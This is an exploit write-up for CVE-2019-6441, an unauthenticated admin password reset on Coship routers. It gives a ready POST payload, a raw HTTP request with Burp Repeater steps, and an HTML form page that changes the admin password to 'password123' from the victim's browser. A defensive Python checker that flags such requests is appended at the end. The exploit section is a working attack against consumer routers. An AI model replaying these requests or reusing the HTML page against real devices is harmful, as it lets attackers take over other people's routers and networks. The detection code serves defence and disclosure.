Coship Router Unauthenticated Admin Password Reset CVE-2019-6441


Nearly all firmware versions of Coship routers are vulnerable to this attack. The vulnerability lies in the firmware's apply.cgi file, which doesn’t check for the authentication headers.

So, by crafting a malicious POST request and sending it to the router, the attacker can change the password of the admin user without requiring any admin credentials or admin interaction.

Exploit Details :

# Exploit Title: Coship Wireless Router – Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Version: 4.0.0.48
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441

Affected Versions :

  • Coship RT3052 - 4.0.0.48
  • Coship RT3050 - 4.0.0.40
  • Coship WM3300 - 5.0.0.54
  • Coship WM3300 - 5.0.0.55
  • Coship RT7620 - 10.0.0.49 etc

Proof Of Concept :

  • URL: http://192.168.1.254 (Wifi Router Gateway)
  • Attack Vector : apply.cgi
  • Payload : page=regx%2Fmanagement%2Faccounts.asp&http_username=admin&http_passwd=password123&usr_confirm_password=password123&action=Submit

Reproduction Steps :

  • Find the router gateway address.
  • Open Burp Suite and browse to the repeater tab.
    POST /apply.cgi HTTP/1.1
    Host: X.X.X.X
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 181
    Connection: close
    Upgrade-Insecure-Requests: 1

    page=regx%2Fmanagement%2Faccounts.asp&http_username=admin&http_passwd=password123&usr_confirm_password=password123&action=Submit
  • Copy and paste the above request into Burp Repeater and change the X.X.X.X to your router gateway address.
  • Set the target to router gateway address and port to 80 in Repeater tab.
  • Click on ‘Go’

The password of the admin will be changed to “password123”.

HTML POC :

<html>
  <!-- Change the X.X.X.X with the router's IP address -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://X.X.X.X/apply.cgi" method="POST">
      <input type="hidden" name="page" value="regx/management/accounts.asp" />
      <input type="hidden" name="http_username" value="admin" />
      <input type="hidden" name="http_passwd" value="password123" />
      <input type="hidden" name="usr_confirm_password" value="password123" />
      <input type="hidden" name="action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Change the X.X.X.X to the router gateway address and save the above code as Exploit.html
  • Open Exploit.html with your Browser
  • Click on “Submit request”

The password of the admin will now be changed to “password123”.
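A defender-side check for the request described above, as an added example that is not part of the original advisory: it parses captured HTTP requests and flags password changes sent to apply.cgi that carry no authentication header or that arrive from a foreign origin, as the HTML form would. The function names, the sample traffic and the assumption that a legitimate admin session carries an `Authorization` header are illustrative, not taken from the firmware.

```python
# Added example: flags unauthenticated or cross-site password changes sent to apply.cgi.
from urllib.parse import parse_qs, urlsplit

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), urlsplit(parts[1]).path, headers, parse_qs(body.strip())

def classify(raw):
    """Return findings for one captured request; an empty list means nothing to report."""
    method, path, headers, form = parse_request(raw)
    if method != "POST" or path.lower() != "/apply.cgi" or "http_passwd" not in form:
        return []
    findings = []
    # Assumption: the router's admin session is carried in an Authorization header.
    if "authorization" not in headers:
        findings.append("password change without Authorization header")
    # A form posted from another page (or a local file, Origin: null) names a foreign origin.
    source = headers.get("origin") or headers.get("referer", "")
    if source and urlsplit(source).netloc != headers.get("host", ""):
        findings.append("cross-site form submission")
    return findings

# Constructed sample traffic (not captured from a real device).
BODY = ("page=regx%2Fmanagement%2Faccounts.asp&http_username=admin"
        "&http_passwd=CONSTRUCTED&usr_confirm_password=CONSTRUCTED&action=Submit")

def build(headers):
    lines = ["POST /apply.cgi HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    return "\r\n".join(lines) + "\r\n\r\n" + BODY

SAMPLES = {
    "no_auth": build([("Host", "192.168.1.254")]),
    "authed": build([("Host", "192.168.1.254"), ("Authorization", "Basic Y29uc3RydWN0ZWQ="),
                     ("Referer", "http://192.168.1.254/regx/management/accounts.asp")]),
    "cross_site": build([("Host", "192.168.1.254"), ("Origin", "null")]),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw))
```

The same two conditions can be expressed as a rule on a proxy or IDS placed in front of the management interface.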
